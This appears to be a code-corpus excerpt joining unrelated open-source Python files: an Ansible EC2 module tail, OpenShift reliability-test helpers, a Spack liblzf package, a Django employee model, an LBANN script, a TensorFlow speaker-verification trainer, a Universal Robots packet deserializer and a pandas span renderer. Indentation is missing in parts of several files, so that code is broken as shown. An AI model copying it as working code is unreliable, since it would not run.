type_name=params['instance_type'],
market_spot=params['market_spot'],
spot_max_price=params['spot_max_price'],
ebs_volume_size=params['ebs_volume_size'],
ebs_volume_type=params['ebs_volume_type'],
)
res = manage_instances(
params['regions'], inst_params, params['instance_count'])
module.exit_json(
changed=res.changed,
active=[r.__dict__ for r in res.active],
terminated=[r.__dict__ for r in res.terminated]
)
if __name__ == '__main__':
module_args = dict(
regions=dict(type='list', required=True),
project=dict(type='str', required=True),
namespace=dict(type='str', required=True),
group=dict(type='str', required=True),
add_tags=dict(type='dict', required=False, default=dict()),
key_name=dict(type='str', required=True),
security_group=dict(type='str', required=True),
instance_type=dict(type='str', required=True),
instance_count=dict(type='int', required=True),
market_spot=dict(type='bool', required=False, default=False),
spot_max_price=dict(type='str', required=False, default=None),
ebs_volume_size=dict(type='int', required=False, default=None),
ebs_volume_type=dict(type='str', required=False, default=None),
)
module = AnsibleModule(
argument_spec=module_args,
supports_check_mode=True
)
run(module)
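# Illustrative playbook usage (sketch, added for clarity; the values below are
# assumptions):
#
# - name: Manage pool instances
#   stateful_set:
#     regions: ['us-east-1', 'eu-west-1']
#     project: poolauto
#     namespace: test
#     group: nodes
#     key_name: my-key
#     security_group: default
#     instance_type: t2.micro
#     instance_count: 4
#   register: ec2_hosts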
|
reliability/tasks/Apps.py | RH-ematysek/svt | 115 | 29948 | from .GlobalData import global_data
from .utils.oc import oc
import requests
import time
import logging
class App:
    def __init__(self, deployment, project, template, build_config, route=""):
self.project = project
self.template = template
self.deployment = deployment
self.build_config = build_config
self.route = route
self.logger = logging.getLogger('reliability')
def build(self, kubeconfig):
(result, rc) = oc("start-build -n " + self.project + " " + self.build_config, kubeconfig)
if rc != 0:
self.logger.error("build_app: Failed to create app " + self.deployment + " in project " + self.project)
return "App build failed for build config : " + self.build_config
else:
with global_data.builds_lock:
global_data.total_build_count += 1
return "App build succeeded for build config : " + self.build_config
def visit(self):
visit_success = False
try:
r = requests.get("http://" + self.route + "/")
self.logger.info(str(r.status_code) + ": visit: " + self.route)
if r.status_code == 200:
visit_success = True
except Exception as e :
self.logger.error(f"visit: {self.route} Exception {e}")
return visit_success
def scale_up(self, kubeconfig):
(result, rc) = oc("scale --replicas=2 -n " + self.project + " dc/" + self.deployment, kubeconfig)
if rc !=0 :
self.logger.error("scale_up: Failed to scale up " + self.project + "." + self.deployment)
return "App scale up failed for deployment : " + self.deployment
else:
return "App scale up succeeded for deployment : " + self.deployment
def scale_down(self, kubeconfig):
(result, rc) = oc("scale --replicas=1 -n " + self.project + " dc/" + self.deployment, kubeconfig)
if rc !=0 :
self.logger.error("scale_down: Failed to scale down " + self.project + "." + self.deployment)
return "App scale down failed for deployment : " + self.deployment
else:
return "App scale down succeeded for deployment : " + self.deployment
class Apps:
def __init__(self):
self.failed_apps = 0
self.apps = {}
self.logger = logging.getLogger('reliability')
def add(self, app, kubeconfig):
(result, rc) = oc("new-app -n " + app.project + " --template " + app.template, kubeconfig)
if rc != 0:
self.logger.error("create_app: Failed to create app " + app.deployment + " in project " + app.project)
return None
else:
self.apps[app.project + "." + app.deployment] = app
(route,rc) = oc("get route --no-headers -n " + app.project + " | awk {'print $2'} | grep " + app.template, kubeconfig)
if rc == 0:
app.route = route.rstrip()
max_tries = 60
current_tries = 0
visit_success = False
while not visit_success and current_tries <= max_tries:
self.logger.info(app.template + " route not available yet, sleeping 10 seconds")
time.sleep(10)
current_tries += 1
visit_success = app.visit()
if not visit_success:
self.failed_apps += 1
self.logger.error("add_app: " + app.project + "." + app.deployment + " did not become available" )
return app
# removing an app just removes the dictionary entry, actual app removed by project deletion
def remove(self,app):
self.apps.pop(app.project + "." + app.deployment)
def simulate(self):
apps = {}
app1 = App('cakephp-mysql-example','cakephp-mysql-example-0','cakephp-mysql-example','cakephp-mysql-example')
self.apps[app1.project + "." + app1.deployment] = app1
# app2 = App('nodejs-mongodb-example','nodejs-mongodb-example-1','nodejs-mongodb-example','nodejs-mongodb-example')
# self.apps[app2.project + "." + app2.deployment] = app2
def init(self):
pass
all_apps=Apps()
if __name__ == "__main__":
app = App("cakephp-mysql-example", "t1", "cakephp-mysql-example","cakephp-mysql-example")
apps = Apps()
# apps.add(app)
# time.sleep(180)
app.visit()
app.scale_up()
time.sleep(30)
app.scale_down()
app.build()
|
var/spack/repos/builtin/packages/liblzf/package.py | BenWibking/spack | 2,360 | 29971 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Liblzf(AutotoolsPackage):
"""LibLZF is a very small data compression library.
It consists of only two .c and two .h files and is very easy to incorporate into
your own programs. The compression algorithm is very, very fast, yet still written
in portable C."""
homepage = "http://oldhome.schmorp.de/marc/liblzf.html"
url = "http://dist.schmorp.de/liblzf/liblzf-3.6.tar.gz"
version('3.6', sha256='9c5de01f7b9ccae40c3f619d26a7abec9986c06c36d260c179cedd04b89fb46a')
|
apps/payroll/models/employee.py | youssriaboelseod/pyerp | 115 | 29979 |
# Django Library
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from apps.base.models import PyFather
# Employee table
class PyEmployee(PyFather):
name = models.CharField('Nombre', max_length=80)
name2 = models.CharField('<NAME>', max_length=80, blank=True)
first_name = models.CharField('Apellido Paterno', max_length=80, blank=True)
last_name = models.CharField('Apellido Materno', max_length=80, blank=True)
phone = models.CharField('Teléfono', max_length=20, blank=True)
email = models.CharField('Correo', max_length=40, blank=True)
def get_absolute_url(self):
return reverse('payroll:employee-detail', kwargs={'pk': self.pk})
def __str__(self):
return format(self.name)
|
model_zoo/jag_utils/python/build_inclusive_from_exclusive.py | jonesholger/lbann | 194 | 29991 | import sys
if len(sys.argv) != 4 :
print 'usage:', sys.argv[0], 'index_fn id_mapping_fn output_fn'
exit(9)
a = open(sys.argv[1])
a.readline()
header = a.readline()
dir = a.readline()
#build map: filename -> set of bad samples
mp = {}
mp_good = {}
mp_bad = {}
for line in a :
t = line.split()
mp[t[0]] = set()
mp_good[t[0]] = t[1]
mp_bad[t[0]] = t[2]
for id in t[3:] :
mp[t[0]].add(id)
a.close()
out = open(sys.argv[3], 'w')
out.write('CONDUIT_HDF5_INCLUSION\n')
out.write(header)
out.write(dir)
a = open(sys.argv[2])
bad = 0
for line in a :
t = line.split()
fn = t[0]
out.write(fn + ' ' + mp_good[fn] + ' ' + mp_bad[fn] + ' ')
for id in t[1:] :
if id not in mp[fn] :
out.write(id + ' ')
else :
bad += 1
out.write('\n')
out.close()
print header
print 'num found bad:', bad
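# Editor's note: hedged usage sketch (argument names follow the usage string above):
#   python build_inclusive_from_exclusive.py exclusion_index.txt id_mapping.txt inclusion_index.txt
# Every sample listed in the mapping but absent from the exclusion index is
# written out as a CONDUIT_HDF5_INCLUSION entry.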
|
model.py | ishine/Speaker_Verification | 337 | 29994 | import tensorflow as tf
import numpy as np
import os
import time
from utils import random_batch, normalize, similarity, loss_cal, optim
from configuration import get_config
from tensorflow.contrib import rnn
config = get_config()
def train(path):
tf.reset_default_graph() # reset graph
# draw graph
batch = tf.placeholder(shape= [None, config.N*config.M, 40], dtype=tf.float32) # input batch (time x batch x n_mel)
lr = tf.placeholder(dtype= tf.float32) # learning rate
global_step = tf.Variable(0, name='global_step', trainable=False)
w = tf.get_variable("w", initializer= np.array([10], dtype=np.float32))
b = tf.get_variable("b", initializer= np.array([-5], dtype=np.float32))
# embedding lstm (3-layer default)
with tf.variable_scope("lstm"):
lstm_cells = [tf.contrib.rnn.LSTMCell(num_units=config.hidden, num_proj=config.proj) for i in range(config.num_layer)]
lstm = tf.contrib.rnn.MultiRNNCell(lstm_cells) # define lstm op and variables
outputs, _ = tf.nn.dynamic_rnn(cell=lstm, inputs=batch, dtype=tf.float32, time_major=True) # for TI-VS must use dynamic rnn
embedded = outputs[-1] # the last output is the embedded d-vector
embedded = normalize(embedded) # normalize
print("embedded size: ", embedded.shape)
# loss
sim_matrix = similarity(embedded, w, b)
print("similarity matrix size: ", sim_matrix.shape)
loss = loss_cal(sim_matrix, type=config.loss)
# optimizer operation
trainable_vars= tf.trainable_variables() # get variable list
optimizer= optim(lr) # get optimizer (type is determined by configuration)
grads, vars= zip(*optimizer.compute_gradients(loss)) # compute gradients of variables with respect to loss
grads_clip, _ = tf.clip_by_global_norm(grads, 3.0) # l2 norm clipping by 3
grads_rescale= [0.01*grad for grad in grads_clip[:2]] + grads_clip[2:] # smaller gradient scale for w, b
train_op= optimizer.apply_gradients(zip(grads_rescale, vars), global_step= global_step) # gradient update operation
# check variables memory
variable_count = np.sum(np.array([np.prod(np.array(v.get_shape().as_list())) for v in trainable_vars]))
print("total variables :", variable_count)
# record loss
loss_summary = tf.summary.scalar("loss", loss)
merged = tf.summary.merge_all()
saver = tf.train.Saver()
# training session
with tf.Session() as sess:
tf.global_variables_initializer().run()
os.makedirs(os.path.join(path, "Check_Point"), exist_ok=True) # make folder to save model
os.makedirs(os.path.join(path, "logs"), exist_ok=True) # make folder to save log
writer = tf.summary.FileWriter(os.path.join(path, "logs"), sess.graph)
epoch = 0
lr_factor = 1 # lr decay factor ( 1/2 per 10000 iteration)
loss_acc = 0 # accumulated loss ( for running average of loss)
for iter in range(config.iteration):
# run forward and backward propagation and update parameters
_, loss_cur, summary = sess.run([train_op, loss, merged],
feed_dict={batch: random_batch(), lr: config.lr*lr_factor})
loss_acc += loss_cur # accumulated loss for each 100 iteration
if iter % 10 == 0:
writer.add_summary(summary, iter) # write at tensorboard
if (iter+1) % 100 == 0:
print("(iter : %d) loss: %.4f" % ((iter+1),loss_acc/100))
loss_acc = 0 # reset accumulated loss
if (iter+1) % 10000 == 0:
lr_factor /= 2 # lr decay
print("learning rate is decayed! current lr : ", config.lr*lr_factor)
if (iter+1) % 10000 == 0:
saver.save(sess, os.path.join(path, "./Check_Point/model.ckpt"), global_step=iter//10000)
print("model is saved!")
# Test Session
def test(path):
tf.reset_default_graph()
# draw graph
enroll = tf.placeholder(shape=[None, config.N*config.M, 40], dtype=tf.float32) # enrollment batch (time x batch x n_mel)
verif = tf.placeholder(shape=[None, config.N*config.M, 40], dtype=tf.float32) # verification batch (time x batch x n_mel)
batch = tf.concat([enroll, verif], axis=1)
# embedding lstm (3-layer default)
with tf.variable_scope("lstm"):
lstm_cells = [tf.contrib.rnn.LSTMCell(num_units=config.hidden, num_proj=config.proj) for i in range(config.num_layer)]
lstm = tf.contrib.rnn.MultiRNNCell(lstm_cells) # make lstm op and variables
outputs, _ = tf.nn.dynamic_rnn(cell=lstm, inputs=batch, dtype=tf.float32, time_major=True) # for TI-VS must use dynamic rnn
embedded = outputs[-1] # the last output is the embedded d-vector
embedded = normalize(embedded) # normalize
print("embedded size: ", embedded.shape)
# enrollment embedded vectors (speaker model)
enroll_embed = normalize(tf.reduce_mean(tf.reshape(embedded[:config.N*config.M, :], shape= [config.N, config.M, -1]), axis=1))
# verification embedded vectors
verif_embed = embedded[config.N*config.M:, :]
similarity_matrix = similarity(embedded=verif_embed, w=1., b=0., center=enroll_embed)
saver = tf.train.Saver(var_list=tf.global_variables())
with tf.Session() as sess:
tf.global_variables_initializer().run()
# load model
print("model path :", path)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir=os.path.join(path, "Check_Point"))
ckpt_list = ckpt.all_model_checkpoint_paths
loaded = 0
for model in ckpt_list:
if config.model_num == int(model.split('-')[-1]): # find ckpt file which matches configuration model number
print("ckpt file is loaded !", model)
loaded = 1
saver.restore(sess, model) # restore variables from selected ckpt file
break
if loaded == 0:
raise AssertionError("ckpt file does not exist! Check config.model_num or config.model_path.")
print("test file path : ", config.test_path)
# return similarity matrix after enrollment and verification
time1 = time.time() # for check inference time
if config.tdsv:
S = sess.run(similarity_matrix, feed_dict={enroll:random_batch(shuffle=False, noise_filenum=1),
verif:random_batch(shuffle=False, noise_filenum=2)})
else:
S = sess.run(similarity_matrix, feed_dict={enroll:random_batch(shuffle=False),
verif:random_batch(shuffle=False, utter_start=config.M)})
S = S.reshape([config.N, config.M, -1])
time2 = time.time()
np.set_printoptions(precision=2)
print("inference time for %d utterances : %0.2fs"%(2*config.M*config.N, time2-time1))
print(S) # print similarity matrix
# calculating EER
diff = 1; EER=0; EER_thres = 0; EER_FAR=0; EER_FRR=0
# through thresholds calculate false acceptance ratio (FAR) and false reject ratio (FRR)
for thres in [0.01*i+0.5 for i in range(50)]:
S_thres = S>thres
# False acceptance ratio = false acceptance / mismatched population (enroll speaker != verification speaker)
FAR = sum([np.sum(S_thres[i])-np.sum(S_thres[i,:,i]) for i in range(config.N)])/(config.N-1)/config.M/config.N
# False reject ratio = false reject / matched population (enroll speaker = verification speaker)
FRR = sum([config.M-np.sum(S_thres[i][:,i]) for i in range(config.N)])/config.M/config.N
# Save threshold when FAR = FRR (=EER)
if diff> abs(FAR-FRR):
diff = abs(FAR-FRR)
EER = (FAR+FRR)/2
EER_thres = thres
EER_FAR = FAR
EER_FRR = FRR
print("\nEER : %0.2f (thres:%0.2f, FAR:%0.2f, FRR:%0.2f)"%(EER,EER_thres,EER_FAR,EER_FRR))
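# ---------------------------------------------------------------------------
# Editor's note: hedged usage sketch, not part of the original file. The repo
# drives these entry points from a separate main script; the path is a placeholder.
def _example_entry(model_path="./tisv_model", training=True):
    # train() writes checkpoints under <model_path>/Check_Point and TensorBoard
    # logs under <model_path>/logs; test() restores config.model_num and prints the EER.
    if training:
        train(model_path)
    else:
        test(model_path)
# ---------------------------------------------------------------------------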
|
ur_driver/src/ur_driver/deserializeRT.py | Hugal31/universal_robot | 749 | 30042 | from __future__ import print_function
import struct
import copy
#this class handles different protocol versions
class RobotStateRT(object):
@staticmethod
def unpack(buf):
rs = RobotStateRT()
(plen, ptype) = struct.unpack_from("!IB", buf)
if plen == 756:
return RobotStateRT_V15.unpack(buf)
elif plen == 812:
return RobotStateRT_V18.unpack(buf)
elif plen == 1044:
return RobotStateRT_V30.unpack(buf)
else:
print("RobotStateRT has wrong length: " + str(plen))
return rs
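# Editor's note: hedged usage sketch, not part of the original driver.
# `buf` stands for a single packet read from the controller's realtime socket
# (typically TCP port 30003); the 4-byte length prefix selects one of the
# version-specific parsers below.
def _example_unpack(buf):
    state = RobotStateRT.unpack(buf)  # returns a RobotStateRT_V15/V18/V30 object
    return state.q_actual             # e.g. actual joint positions (6 doubles)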
#this parses RobotStateRT for version v1.5
#http://wiki03.lynero.net/Technical/RealTimeClientInterface?foswiki_redirect_cache=9b4574b30760f720c6f79c5f1f2203dd
class RobotStateRT_V15(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'tool_acc_values',
'unused',
'tcp_force', 'tool_vector', 'tcp_speed',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V15()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
###
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 15x double (15x 8byte)
offset+=120
rs.unused = []
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector = copy.deepcopy(all_values)
#tcp_speed: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
return rs
#this parses RobotStateRT for versions <= v1.8 (i.e. 1.6, 1.7, 1.8)
class RobotStateRT_V18(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'tool_acc_values',
'unused',
'tcp_force', 'tool_vector', 'tcp_speed',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value',
'robot_mode', 'joint_modes']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V18()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 15x double (15x 8byte)
offset+=120
rs.unused = []
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector = copy.deepcopy(all_values)
#tcp_speed: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#robot_mode: 1x double (1x 8byte)
rs.robot_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#joint_mode: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.joint_modes = copy.deepcopy(all_values)
return rs
#this parses RobotStateRT for versions >=3.0 (i.e. 3.0)
class RobotStateRT_V30(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'i_control',
'tool_vector_actual', 'tcp_speed_actual', 'tcp_force',
'tool_vector_target', 'tcp_speed_target',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value',
'robot_mode', 'joint_modes', 'safety_mode',
#6xd: unused
'tool_acc_values',
#6xd: unused
'speed_scaling', 'linear_momentum_norm',
#2xd: unused
'v_main', 'v_robot', 'i_robot', 'v_actual']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V30()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
#i_control: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_control = copy.deepcopy(all_values)
#tool_vector_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector_actual = copy.deepcopy(all_values)
#tcp_speed_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed_actual = copy.deepcopy(all_values)
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector_target = copy.deepcopy(all_values)
#tcp_speed_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed_target = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#robot_mode: 1x double (1x 8byte)
rs.robot_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#joint_modes: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.joint_modes = copy.deepcopy(all_values)
#safety_mode: 1x double (1x 8byte)
rs.safety_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#unused: 6x double (6x 8byte)
offset+=48
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 6x double (6x 8byte)
offset+=48
#speed_scaling: 1x double (1x 8byte)
rs.speed_scaling = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#linear_momentum_norm: 1x double (1x 8byte)
rs.linear_momentum_norm = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#unused: 2x double (2x 8byte)
offset+=16
#v_main: 1x double (1x 8byte)
rs.v_main = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#v_robot: 1x double (1x 8byte)
rs.v_robot = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#i_robot: 1x double (1x 8byte)
rs.i_robot = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#v_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.v_actual = copy.deepcopy(all_values)
return rs
|
text_extensions_for_pandas/jupyter/span.py | ZachEichen/text-extensions-for-pandas | 193 | 30055 | #
# Copyright (c) 2021 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# span.py
#
# Part of text_extensions_for_pandas
#
# Support for span-centric Jupyter rendering and utilities
#
import textwrap
from typing import *
from enum import Enum
import text_extensions_for_pandas.resources
# TODO: This try/except block is for Python 3.6 support, and should be
# reduced to just importing importlib.resources when 3.6 support is dropped.
try:
import importlib.resources as pkg_resources
except ImportError:
import importlib_resources as pkg_resources
# Limits the max number of displayed documents. Matches Pandas' default display.max_seq_items.
_DOCUMENT_DISPLAY_LIMIT = 100
class SetType(Enum):
NESTED=1
OVERLAP=2
class RegionType(Enum):
NESTED=1
COMPLEX=2
SOLO=3
def pretty_print_html(column: Union["SpanArray", "TokenSpanArray"],
show_offsets: bool) -> str:
"""
HTML pretty-printing of a series of spans for Jupyter notebooks.
Args:
column: Span column (either character or token spans).
show_offsets: True to generate a table of span offsets in addition
to the marked-up text
"""
# Local import to prevent circular dependencies
from text_extensions_for_pandas.array.span import SpanArray
from text_extensions_for_pandas.array.token_span import TokenSpanArray
if not isinstance(column, (SpanArray, TokenSpanArray)):
raise TypeError(f"Expected SpanArray or TokenSpanArray, but received "
f"{column} of type {type(column)}")
# Gets the main script and stylesheet from the 'resources' sub-package
style_text: str = pkg_resources.read_text(text_extensions_for_pandas.resources, "span_array.css")
script_text: str = pkg_resources.read_text(text_extensions_for_pandas.resources, "span_array.js")
# Declare initial variables common to all render calls
instance_init_script_list: List[str] = []
# For each document, pass the array of spans and document text into the script's render function
document_columns = column.split_by_document()
for column_index in range(min(_DOCUMENT_DISPLAY_LIMIT, len(document_columns))):
# Get a javascript representation of the column
span_array = []
token_span_array = []
for e in document_columns[column_index]:
span_array.append(f"""[{e.begin},{e.end}]""")
if hasattr(e, "tokens"):
token_span_array.append(f"""[{e.begin_token},{e.end_token}]""")
document_object_script = f"""
const doc_spans = [{','.join(span_array)}]
const doc_text = '{_get_escaped_doctext(document_columns[column_index])}'
"""
# If the documents are a TokenSpanArray, include the start and end token indices in the document object.
if len(token_span_array) > 0:
document_object_script += f"""
const doc_token_spans = [{','.join(token_span_array)}]
documents.push({{doc_text: doc_text, doc_spans: doc_spans, doc_token_spans: doc_token_spans}})
"""
else:
document_object_script += """
documents.push({doc_text: doc_text, doc_spans: doc_spans})
"""
instance_init_script_list.append(f"""
{{
{document_object_script}
}}
""")
# Defines a list of DOM strings to be appended to the end of the returned HTML.
postfix_tags: List[str] = []
if len(document_columns) > _DOCUMENT_DISPLAY_LIMIT:
postfix_tags.append(f"""
<footer>Documents truncated. Showing {_DOCUMENT_DISPLAY_LIMIT} of {len(document_columns)}</footer>
""")
# Get the show_offsets parameter as a JavaScript boolean
show_offset_string = 'true' if show_offsets else 'false'
return textwrap.dedent(f"""
<style class="span-array-css">
{textwrap.indent(style_text, ' ')}
</style>
<script>
{{
{textwrap.indent(script_text, ' ')}
}}
</script>
<div class="span-array">
{_get_initial_static_html(column, show_offsets)}
